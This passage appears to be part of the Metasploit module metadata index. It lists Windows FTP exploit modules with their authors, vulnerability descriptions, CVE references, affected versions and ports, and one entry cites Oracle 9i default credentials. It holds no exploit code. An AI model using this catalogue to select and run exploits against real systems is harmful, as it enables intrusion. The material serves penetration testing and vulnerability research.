],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2018-06-29 14:22:40 +0000",
"path": "/modules/exploits/windows/ftp/ftpshell_cli_bof.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ftpshell_cli_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ftpsynch_list_reply": {
"name": "FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/ftpsynch_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"myne-us",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow vulnerability in FTP Synchronizer Pro\n version 4.0.73.274. The overflow gets triggered by sending an overly long filename to\n the client in response to a LIST command.\n The LIST command gets issued when doing a preview or when you have just created a new\n sync profile and allow the tool to see the differences.\n This will overwrite a structured exception handler and trigger an access violation.",
"references": [
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XP Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/ftpsynch_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ftpsynch_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/gekkomgr_list_reply": {
"name": "Gekko Manager FTP Client Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/gekkomgr_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"nullthreat",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a buffer overflow in Gekko Manager ftp client, triggered when\n processing the response received after sending a LIST request. If this response contains\n a long filename, a buffer overflow occurs, overwriting a structured exception handler.",
"references": [
"OSVDB-68641",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XP SP3 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/gekkomgr_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/gekkomgr_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/globalscapeftp_input": {
"name": "GlobalSCAPE Secure FTP Server Input Overflow",
"full_name": "exploit/windows/ftp/globalscapeftp_input",
"rank": 500,
"disclosure_date": "2005-05-01",
"type": "exploit",
"author": [
"Fairuzan Roslan <riaf@mysec.org>",
"Mati Aharoni <mati@see-security.com>"
],
"description": "This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.\n All versions prior to 3.0.3 are affected by this flaw. A valid user account (\n or anonymous access) is required for this exploit to work.",
"references": [
"CVE-2005-1415",
"OSVDB-16049",
"BID-13454",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"GlobalSCAPE Secure FTP Server <= 3.0.2 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/globalscapeftp_input.rb",
"is_install_path": true,
"ref_name": "windows/ftp/globalscapeftp_input",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/goldenftp_pass_bof": {
"name": "GoldenFTP PASS Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/goldenftp_pass_bof",
"rank": 200,
"disclosure_date": "2011-01-23",
"type": "exploit",
"author": [
"Craig Freyman",
"bannedit <bannedit@metasploit.com>",
"Joff Thyer <jsthyer@gmail.com>"
],
"description": "This module exploits a vulnerability in the Golden FTP service, using the PASS\n command to cause a buffer overflow. Please note that in order to trigger the vulnerable\n code, the victim machine must have the \"Show new connections\" setting enabled. By\n default, this option is unchecked.",
"references": [
"CVE-2006-6576",
"OSVDB-35951",
"BID-45957",
"EDB-16036"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic",
"Windows XP Pro SP3",
"Windows XP Pro SP2",
"Windows XP Pro SP0/SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/goldenftp_pass_bof.rb",
"is_install_path": true,
"ref_name": "windows/ftp/goldenftp_pass_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/httpdx_tolog_format": {
"name": "HTTPDX tolog() Function Format String Vulnerability",
"full_name": "exploit/windows/ftp/httpdx_tolog_format",
"rank": 500,
"disclosure_date": "2009-11-17",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a format string vulnerability in HTTPDX FTP server.\n By sending a specially crafted FTP command containing format specifiers, an\n attacker can corrupt memory and execute arbitrary code.\n\n By default logging is off for HTTP, but enabled for the 'moderator' user\n via FTP.",
"references": [
"CVE-2009-4769",
"OSVDB-60181"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic Targeting",
"httpdx 1.4 - Windows XP SP3 English",
"httpdx 1.4.5 - Windows XP SP3 English",
"httpdx 1.4.6 - Windows XP SP3 English",
"httpdx 1.4.6b - Windows XP SP3 English",
"httpdx 1.5 - Windows XP SP3 English"
],
"mod_time": "2018-08-20 18:08:19 +0000",
"path": "/modules/exploits/windows/ftp/httpdx_tolog_format.rb",
"is_install_path": true,
"ref_name": "windows/ftp/httpdx_tolog_format",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/ftp/kmftp_utility_cwd": {
"name": "Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow",
"full_name": "exploit/windows/ftp/kmftp_utility_cwd",
"rank": 300,
"disclosure_date": "2015-08-23",
"type": "exploit",
"author": [
"Shankar Damodaran",
"Muhamad Fadzil Ramli <mind1355@gmail.com>"
],
"description": "This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.\n Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which\n leads to an SEH overflow. Konica FTP allows anonymous access by default; valid\n credentials are typically unnecessary to exploit this vulnerability.",
"references": [
"CVE-2015-7768",
"EDB-37908"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 7 SP1 x86"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/ftp/kmftp_utility_cwd.rb",
"is_install_path": true,
"ref_name": "windows/ftp/kmftp_utility_cwd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/labf_nfsaxe": {
"name": "LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/labf_nfsaxe",
"rank": 300,
"disclosure_date": "2017-05-15",
"type": "exploit",
"author": [
"Tulpa",
"Daniel Teixeira"
],
"description": "This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote\n code execution.",
"references": [
"CVE-2017-18047",
"EDB-42011"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/ftp/labf_nfsaxe.rb",
"is_install_path": true,
"ref_name": "windows/ftp/labf_nfsaxe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/leapftp_list_reply": {
"name": "LeapFTP 3.0.1 Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/leapftp_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"corelanc0d3r <peter.ve@corelan.be>",
"nullthreat"
],
"description": "This module exploits a buffer overflow in the LeapFTP 3.0.1 client.\n This issue is triggered when a file with a long name is downloaded/opened.",
"references": [
"OSVDB-68640",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/leapftp_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/leapftp_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/leapftp_pasv_reply": {
"name": "LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow",
"full_name": "exploit/windows/ftp/leapftp_pasv_reply",
"rank": 300,
"disclosure_date": "2003-06-09",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600\n client that is triggered through an excessively long PASV reply command. This\n module was ported from the original exploit by drG4njubas with minor improvements.",
"references": [
"CVE-2003-0558",
"OSVDB-4587",
"BID-7860",
"EDB-54"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal LeapFTP.exe",
"Windows 2000 SP0/4 English",
"Windows XP SP0 English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/ftp/leapftp_pasv_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/leapftp_pasv_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ms09_053_ftpd_nlst": {
"name": "MS09-053 Microsoft IIS FTP Server NLST Response Overflow",
"full_name": "exploit/windows/ftp/ms09_053_ftpd_nlst",
"rank": 500,
"disclosure_date": "2009-08-31",
"type": "exploit",
"author": [
"Kingcope <kcope2@googlemail.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP\n service. The flaw is triggered when a special NLST argument is passed\n while the session has changed into a long directory path. For this exploit\n to work, the FTP server must be configured to allow write access to the\n file system (either anonymously or in conjunction with a real account)",
"references": [
"EDB-9541",
"CVE-2009-3023",
"OSVDB-57589",
"BID-36189",
"MSB-MS09-053"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 2000 SP4 English/Italian (IIS 5.0)",
"Windows 2000 SP3 English (IIS 5.0)",
"Windows 2000 SP0-SP3 Japanese (IIS 5.0)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ms09_053_ftpd_nlst",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/netterm_netftpd_user": {
"name": "NetTerm NetFTPD USER Buffer Overflow",
"full_name": "exploit/windows/ftp/netterm_netftpd_user",
"rank": 500,
"disclosure_date": "2005-04-26",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a vulnerability in the NetTerm NetFTPD\n application. This package is part of the NetTerm package.\n This module uses the USER command to trigger the overflow.",
"references": [
"CVE-2005-1323",
"OSVDB-15865",
"URL-https://seclists.org/lists/fulldisclosure/2005/Apr/0578.html",
"BID-13396"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"NetTerm NetFTPD Universal",
"Windows 2000 English",
"Windows XP English SP0/SP1",
"Windows 2003 English",
"Windows NT 4.0 SP4/SP5/SP6"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/ftp/netterm_netftpd_user.rb",
"is_install_path": true,
"ref_name": "windows/ftp/netterm_netftpd_user",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/odin_list_reply": {
"name": "Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)",
"full_name": "exploit/windows/ftp/odin_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"rick2600",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in Odin Secure FTP 4.1,\n triggered when processing the response on a LIST command. During the overflow,\n a structured exception handler record gets overwritten.",
"references": [
"OSVDB-68824",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XP SP3 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/odin_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/odin_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/open_ftpd_wbem": {
"name": "Open-FTPD 1.2 Arbitrary File Upload",
"full_name": "exploit/windows/ftp/open_ftpd_wbem",
"rank": 600,
"disclosure_date": "2012-06-18",
"type": "exploit",
"author": [
"Serge Gorbunov",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits multiple vulnerabilities found in Open&Compact FTP\n server. The software contains an authentication bypass vulnerability and an\n arbitrary file upload vulnerability that allows a remote attacker to write\n arbitrary files to the file system as long as there is at least one user\n who has permission.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine as an exe file, and then uploading another mof file, which enables\n WMI (Management Instrumentation service) to execute the uploaded payload.\n Please note that this module currently only works for Windows before Vista.",
"references": [
"OSVDB-65687",
"EDB-13932",
"CVE-2010-2620"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Open&Compact FTP 1.2 on Windows (Before Vista)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/ftp/open_ftpd_wbem.rb",
"is_install_path": true,
"ref_name": "windows/ftp/open_ftpd_wbem",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/oracle9i_xdb_ftp_pass": {
"name": "Oracle 9i XDB FTP PASS Overflow (win32)",
"full_name": "exploit/windows/ftp/oracle9i_xdb_ftp_pass",
"rank": 500,
"disclosure_date": "2003-08-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "By passing an overly long string to the PASS command, a\n stack based buffer overflow occurs. David Litchfield has\n illustrated multiple vulnerabilities in the Oracle 9i XML\n Database (XDB) during a seminar on \"Variations in exploit\n methods between Linux and Windows\" presented at the Blackhat\n conference.",
"references": [
"CVE-2003-0727",
"OSVDB-2449",
"BID-8375",
"URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 2100,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Oracle 9.2.0.1 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb",
"is_install_path": true,
"ref_name": "windows/ftp/oracle9i_xdb_ftp_pass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/oracle9i_xdb_ftp_unlock": {
"name": "Oracle 9i XDB FTP UNLOCK Overflow (win32)",
"full_name": "exploit/windows/ftp/oracle9i_xdb_ftp_unlock",
"rank": 500,
"disclosure_date": "2003-08-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"David Litchfield <david@ngssoftware.com>"
],
"description": "By passing an overly long token to the UNLOCK command, a\n stack based buffer overflow occurs. David Litchfield has\n illustrated multiple vulnerabilities in the Oracle 9i XML\n Database (XDB) during a seminar on \"Variations in exploit\n methods between Linux and Windows\" presented at the Blackhat\n conference. Oracle9i includes a number of default accounts,\n including dbsnmp:dbsmp, scott:tiger, system:manager, and\n sys:change_on_install.",
"references": [
"CVE-2003-0727",
"OSVDB-2449",
"BID-8375",
"URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 2100,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Oracle 9.2.0.1 Universal"
],
"mod_time": "2018-08-20 16:05:58 +0000",
"path": "/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb",
"is_install_path": true,
"ref_name": "windows/ftp/oracle9i_xdb_ftp_unlock",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/ftp/pcman_put": {
"name": "PCMAN FTP Server Buffer Overflow - PUT Command",
"full_name": "exploit/windows/ftp/pcman_put",
"rank": 300,
"disclosure_date": "2015-08-07",
"type": "exploit",
"author": [
"Jay Turla",
"Chris Higgins"
],
"description": "This module exploits a buffer overflow vulnerability found in the PUT command of the\n PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous\n credentials are enabled.",
"references": [
"CVE-2013-4730",
"EDB-37731",
"OSVDB-94624"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows XP SP3 English"
],
"mod_time": "2018-08-20 16:05:58 +0000",
"path": "/modules/exploits/windows/ftp/pcman_put.rb",
"is_install_path": true,
"ref_name": "windows/ftp/pcman_put",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/pcman_stor": {
"name": "PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/pcman_stor",
"rank": 300,
"disclosure_date": "2013-06-27",
"type": "exploit",
"author": [
"Christian (Polunchis) Ramirez",
"Rick (nanotechz9l) Flores"
],
"description": "This module exploits a buffer overflow vulnerability found in the STOR command of the\n PCMAN FTP v2.07 Server when the \"/../\" parameters are also sent to the server. Please\n note authentication is required in order to trigger the vulnerability. The overflowing\n string will also be seen on the FTP server log console.",
"references": [
"CVE-2013-4730",
"OSVDB-94624",
"EDB-27703"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows XP SP3 English"
],
"mod_time": "2018-08-20 16:05:58 +0000",
"path": "/modules/exploits/windows/ftp/pcman_stor.rb",
"is_install_path": true,
"ref_name": "windows/ftp/pcman_stor",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/proftp_banner": {
"name": "ProFTP 2.9 Banner Remote Buffer Overflow",
"full_name": "exploit/windows/ftp/proftp_banner",
"rank": 300,
"disclosure_date": "2009-08-25",
"type": "exploit",
"author": [
"His0k4 <his0k4.hlm@gmail.com>"
],
"description": "This module exploits a buffer overflow in the ProFTP 2.9\n client that is triggered through an excessively long welcome message.",
"references": [
"CVE-2009-3976",
"OSVDB-57394",
"URL-http://www.labtam-inc.com/index.php?act=products&pid=1"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/proftp_banner.rb",
"is_install_path": true,
"ref_name": "windows/ftp/proftp_banner",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/quickshare_traversal_write": {
"name": "QuickShare File Server 1.2.1 Directory Traversal Vulnerability",
"full_name": "exploit/windows/ftp/quickshare_traversal_write",
"rank": 600,
"disclosure_date": "2011-02-03",
"type": "exploit",
"author": [
"modpr0be",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in QuickShare File Server's FTP\n service. By supplying \"../\" in the file path, it is possible to trigger a\n directory traversal flaw, allowing the attacker to read a file outside the\n virtual directory. By default, the \"Writable\" option is enabled during account\n creation, therefore this makes it possible to create a file at an arbitrary\n location, which leads to remote code execution.",
"references": [
"OSVDB-70776",
"EDB-16105",
"URL-http://www.quicksharehq.com/blog/quickshare-file-server-1-2-2-released.html",
"URL-http://www.digital-echidna.org/2011/02/quickshare-file-share-1-2-1-directory-traversal-vulnerability/"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"QuickShare File Server 1.2.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/quickshare_traversal_write.rb",
"is_install_path": true,
"ref_name": "windows/ftp/quickshare_traversal_write",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ricoh_dl_bof": {
"name": "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",
"full_name": "exploit/windows/ftp/ricoh_dl_bof",
"rank": 300,
"disclosure_date": "2012-03-01",
"type": "exploit",
"author": [
"Julien Ahrens",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP\n service. By supplying a long string of data to the USER command, it is\n possible to trigger a stack-based buffer overflow, which allows remote code\n execution under the context of the user.\n\n Please note that in order to trigger the vulnerability, the server must\n be configured with a log file name (by default, it's disabled).",
"references": [
"CVE-2012-5002",
"OSVDB-79691",
"URL-http://secunia.com/advisories/47912",
"URL-http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/ricoh_dl_bof.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ricoh_dl_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/sami_ftpd_list": {
"name": "Sami FTP Server LIST Command Buffer Overflow",
"full_name": "exploit/windows/ftp/sami_ftpd_list",
"rank": 100,
"disclosure_date": "2013-02-27",
"type": "exploit",
"author": [
"superkojiman",
"Doug Prostko <dougtko@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1.\n The vulnerability exists in the processing of LIST commands. In order to trigger\n the vulnerability, the \"Log\" tab must be viewed in the Sami FTP Server managing\n application, in the target machine. In addition, the source IP address used\n to connect to the FTP Server is needed. If the user can't provide it, the module\n will try to resolve it. This module has been tested successfully on Sami FTP Server\n 2.0.1 over Windows XP SP3.",
"references": [
"OSVDB-90815",
"BID-58247",
"EDB-24557"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Sami FTP Server 2.0.1 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/sami_ftpd_list.rb",
"is_install_path": true,
"ref_name": "windows/ftp/sami_ftpd_list",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/sami_ftpd_user": {
"name": "KarjaSoft Sami FTP Server v2.02 USER Overflow",
"full_name": "exploit/windows/ftp/sami_ftpd_user",
"rank": 300,
"disclosure_date": "2006-01-24",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits the KarjaSoft Sami FTP Server version 2.02\n by sending an excessively long USER string. The stack is overwritten\n when the administrator attempts to view the FTP logs. Therefore, this exploit\n is passive and requires end-user interaction. Keep this in mind when selecting\n payloads. When the server is restarted, it will re-execute the exploit until\n the logfile is manually deleted via the file system.",
"references": [
"CVE-2006-0441",
"CVE-2006-2212",
"OSVDB-25670",
"BID-16370",
"BID-22045",
"BID-17835",
"EDB-1448",
"EDB-1452",
"EDB-1462",
"EDB-3127",
"EDB-3140"
],
"platform": "Windows",
"arch": "x86",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 Pro All - English",
"Windows 2000 Pro All - Italian",
"Windows 2000 Pro All - French",
"Windows XP SP0/1 - English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/ftp/sami_ftpd_user.rb",
"is_install_path": true,
"ref_name": "windows/ftp/sami_ftpd_user",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/sasser_ftpd_port": {
"name": "Sasser Worm avserve FTP PORT Buffer Overflow",
"full_name": "exploit/windows/ftp/sasser_ftpd_port",
"rank": 200,
"disclosure_date": "2004-05-10",
"type": "exploit",
"author": [
"valsmith <valsmith@metasploit.com>",
"chamuco <chamuco@gmail.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits the FTP server component of the Sasser worm.\n By sending an overly long PORT command the stack can be overwritten.",
"references": [
"OSVDB-6197"
],
"platform": "Windows",
"arch": "x86",
"rport": 5554,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows XP SP0",
"Windows XP SP1"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/ftp/sasser_ftpd_port.rb",
"is_install_path": true,
"ref_name": "windows/ftp/sasser_ftpd_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/scriptftp_list": {
"name": "ScriptFTP LIST Remote Buffer Overflow",
"full_name": "exploit/windows/ftp/scriptftp_list",
"rank": 400,
"disclosure_date": "2011-10-12",
"type": "exploit",
"author": [
"modpr0be",
"TecR0c <roccogiovannicalvi@gmail.com>",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow\n vulnerability that is triggered when processing a sufficiently long\n filename during an FTP LIST command, resulting in overwriting the\n exception handler. Social engineering of executing a specially crafted\n ftp file by double click will result in connecting to our malicious\n server and performing arbitrary code execution, which allows the attacker to\n gain the same rights as the user running ScriptFTP. This vulnerability\n affects versions 3.3 and earlier.",
"references": [
"CVE-2011-3976",
"OSVDB-75633",
"EDB-17876",
"US-CERT-VU-440219"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 / Windows Vista"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/ftp/scriptftp_list.rb",
"is_install_path": true,
"ref_name": "windows/ftp/scriptftp_list",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/seagull_list_reply": {
"name": "Seagull FTP v3.3 Build 409 Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/seagull_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a buffer overflow in the Seagull FTP client that gets\n triggered when the ftp client processes a response to a LIST command. If the\n response contains an overly long file/folder name, a buffer overflow occurs,\n overwriting a structured exception handler.",
"references": [
"OSVDB-94556",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XP Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/ftp/seagull_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/seagull_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/servu_chmod": {
"name": "Serv-U FTP Server Buffer Overflow",
"full_name": "exploit/windows/ftp/servu_chmod",
"rank": 300,
"disclosure_date": "2004-12-31",
"type": "exploit",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the site chmod command\n in versions of Serv-U FTP Server prior to 4.2.\n\n You must have valid credentials to trigger this vulnerability. Exploitation\n also leaves the service in a non-functional state.",
"references": [
"CVE-2004-2111",
"OSVDB-3713",
"BID-9483"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 2000 SP0-4 EN",
"Windows XP SP0-1 EN"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/servu_chmod.rb",
"is_install_path": true,
"ref_name": "windows/ftp/servu_chmod",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/servu_mdtm": {
"name": "Serv-U FTPD MDTM Overflow",
"full_name": "exploit/windows/ftp/servu_mdtm",
"rank": 400,
"disclosure_date": "2004-02-26",
"type": "exploit",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "This is an exploit for Serv-U's MDTM command timezone\n overflow. It has been heavily tested against versions\n 4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against\n nt4/2k/xp/2k3. I have also had success against version 3,\n but only tested 1 version/os. The bug is in all versions\n prior to 5.0.0.4, but this exploit will not work against\n versions not listed above. You only get one shot, but it\n should be OS/SP independent.\n\n This exploit is a single hit; the service dies after the\n shellcode finishes execution.",
"references": [
"CVE-2004-0330",
"OSVDB-4073",
"URL-http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html",
"BID-9751"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
